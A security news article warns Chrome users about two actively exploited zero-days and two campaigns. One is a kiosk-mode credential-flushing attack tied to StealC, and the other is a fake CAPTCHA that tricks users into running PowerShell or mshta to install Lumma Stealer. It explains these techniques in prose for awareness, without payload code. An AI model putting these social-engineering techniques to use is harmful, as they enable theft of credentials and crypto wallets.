Updated on September 16 with new CAPTCHA attack targeting Windows users.
It has been a busy few weeks for Chrome with plenty of news for its 3 billion users to digest. And so it would be all too easy to forget a fast-approaching update deadline is now just 72-hours away. Google confirmed that attackers have actively exploited two dangerous Chrome vulnerabilities, and users must not remain unprotected.
The first of those memory threats was made public in a Chrome update on August 21, with Google warning that CVE-2024-7971 was under active exploitation. The nasty surprise was that a second memory vulnerability fixed in that same update—CVE-2024-7965—was also under attack. Google confirmed as much a week later.
The U.S. government’s cybersecurity agency added both threats to its Known Exploited Vulnerabilities (KEV) mandating all federal employees update Chrome by September 16 (and September 18 for the second fix) or stop using their browsers. And while CISA’s deadlines are only mandatory for government staff, many organizations follow its mandates. To put it more simply—there are two actively exploited vulnerabilities, update Chrome now if you have not done so since early September.
As CISA explains, it “maintains the authoritative source of vulnerabilities that have been exploited in the wild. Organizations should use the KEV catalog as an input to their vulnerability management prioritization framework.”
There have been two desktop Chrome updates since then, on September 2 and 10 respectively, both of which addressed high-severity vulnerabilities, albeit none confirmed as yet to have been actively exploited in the wild.
Somewhat ironically, given its own procession of zero-days—including this week’s Patch Tuesday, one of the serious Chrome vulnerabilities was discovered and disclosed by Microsoft, attributing the attack to North Korean crypto hackers chaining the Chrome vulnerability to an (also now patched) Windows zero-day.
Microsoft suggested this as a reason for users to switch from Chrome to Edge, advising organizations to “encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.”
While I wouldn’t advise that, Microsoft’s warning that Chrome phishing lures need to be stopped at source is critical. And Google is making its own moves to do just that. Google assured this week that its “revamped Safety Check feature will now run automatically in the background on Chrome, taking more proactive steps to keep you safe. It will also inform you of actions it takes, including revoking permissions from sites you don’t visit anymore, flagging potentially unwanted notifications and more.”
Microsoft has just released its latest Microsoft Threat Intelligence podcast, which delves into the nature of the North Korean threat that was behind its disclosure of CVE-2024-7971. shedding some light on the “surprising nature of recent attack chains involving vulnerability in the Chromium engine.”
Chrome comes in for a lot of flack—the downside of market domination—but deserves credit for its constant improvements; albeit you have to overlook the underlying advertising and cookie-drive data collection. This is making a difference, as one bemusing exchange on X this week illustrated. Google’s crackdown on infostealers exploiting Chrome weaknesses is starting to bolt the stable door. Albeit the exchange shows the other side clearly intend to find new ways through.
While the latest worldwide browser market share data shows Edge continuing to build its user base, it’s an exceptionally slow build; Statcounter reports a statistically irrelevant increase from 13.75% from July to 13.78% in August this year, albeit the year-on year growth is more encouraging, with Edge up from 11.15% a year ago.
Updating Chrome to the latest release will address the two exploited zero-days as well as everything fixed since. As ever, check the update has downloaded and then restart your browser to ensure it installs. If you have made the switch to Edge, you need to do the very same—the actively exploited threats impact both browsers.
Sometimes the most dangerous threats hide in plain sight, and can hit even when you have done the right thing and updated. That’s certainly the case with a new warning for Chrome users, with a devious new attack targeting that relies on frustrating you into doing something you know you shouldn’t—which makes it worse.
As picked up by Bleeping Computer, this novel attack—first disclosed by OALABS Research—is “a new technique used by stealers to force victims into entering credentials into a browser, allowing them to be stolen from the browser’s credential store using traditional stealer malware.”
The researchers explain that this opens the door to StealC malware, with the campaign designed specifically to steal Google account credentials. The attack works by tricking the browser into what’s called “kiosk mode,” before “navigating to the login page of the targeted service, usually Google.” This kiosk mode is a full screen web view, and the attack prevents exiting or even moving away from the full-screen.
“This tactic annoys the victim into entering their credentials in an attempt to close the window. Once the credentials are entered, they are stored in the browser’s credential store on disk and can be stolen using stealer malware, which is deployed along with the credential flusher.”
As Bleeping Computer explains, because the usual keys have been disabled, “try other hotkey combos like ‘Alt + F4’, ‘Ctrl + Shift + Esc’, ‘Ctrl + Alt +Delete’, and ‘Alt +Tab.’” If that doesn’t work by returning focus to your desktop, “Pressing ‘Win Key + R’ should open the Windows command prompt. Type ‘cmd’ and then kill Chrome with ‘taskkill /IM chrome.exe /F.’” Or, failing that, hard reboot your PC.
There is also a second nasty new threat for Chrome users now hiding in plain sight, albeit this one is so stupidly simple it should be much easier to detect. One would hope that if hits your PC, you won’t fall victim and will quickly shut it down.
This attack relies on the use of a fake CAPTCHA and was first flagged by Palo Alto Networks’ Unit 42, but received very little attention at the time. Now there’s a video doing the rounds on X from researcher John Hammond, which will boost ratings.
As the researchers explain, “as recently as 2024-08-27, fake verification pages have been established to distribute Lumma Stealer malware. These pages have a button that, when clicked, shows instructions for victims to paste PowerShell script into a Run window. This copy/paste PowerShell script retrieves and runs a Windows EXE for Lumma Stealer malware. The associated Lumma Stealer EXE files retrieve and use zip archives that don’t appear to be inherently malicious on their own.”
Lumma Stealer is an info-stealer that is often rented out as a nasty malware-as-a-service play; it targets user credentials and crypto wallets. As you can see from the X video (below), this doesn’t look like an everyday CAPTCHA with its request for users to copy, paste and enter a script. Candidly, if alarm bells aren’t ringing in your head at this point you should maybe power down your PC and take a rest.
Hudson Rock’s Infostealers website reported on the same attack a fortnight ago, but again this didn’t receive the pickup it deserved. “As of late August 2024,” the researchers warned, “attackers have been using fraudulent ‘human verification’ pages to trick users into executing a malicious PowerShell script.”
The CAPTCHA itself is delivered by way of source code in the malicious website the user has visited. “This code clearly shows that when the verification button is clicked, the encrypted code is automatically copied to the clipboard.”
That code triggers the mshta binary, “a legitimate Windows utility used to execute HTML Applications (HTA) and handle embedded scripts… Since it’s a trusted and signed binary by Microsoft, it often bypasses security filters, making it a prime candidate for exploitation in ‘living off the land’ attacks. This technique allows attackers to execute malicious scripts without raising alarms, as mshta.exe typically won’t be flagged by antivirus or endpoint protection systems.”
If you haven’t cut and run by this point, the malware will execute another command to download the Lumma Stealer payload, “designed to exfiltrate sensitive information such as passwords, session tokens, cryptocurrency wallets, and other personal data from infected machines.”
Just as with the Google login window running in full–screen kiosk mode, the intent here is to socially engineer an attack that hides behind the familiar, leveraging the trust users will have in Google logins or website captcha verification boxes. CAPTCHA tests have become such an everyday part of using the web that we gloss over them. And where these were once all very similar, we do now see much more variety than before as the “are you human” challenges evolve.
And this is likely going to get worse. CAPTCHA, aka the ”Completely Automated Public Turing test to tell Computers and Humans Apart,” will be one of the many beneficiaries from the accelerating addition of more advanced AI into so much of what we do online and the ways we interact with our devices. While this attack is crude and easy to detect, you can expect much more sophisticated variations on this theme to emerge, especially as we all find out feet in this brave new world.
As PC Mag warns, “malicious CAPTCHA tests could be easily circulated to targets by sending them phishing emails or messages. So users should be on guard if they encounter any unusual requests from a CAPTCHA test that comes their way; it could be a trap.”
This all goes to show that you can do all the right things—including updating asap, and there’s still a socially engineered campaign that’s coming for your data. If you do find yourself falling victim to this or anything similar, remember to run an up-to-date antivirus scan on your PC before you continue using as normal.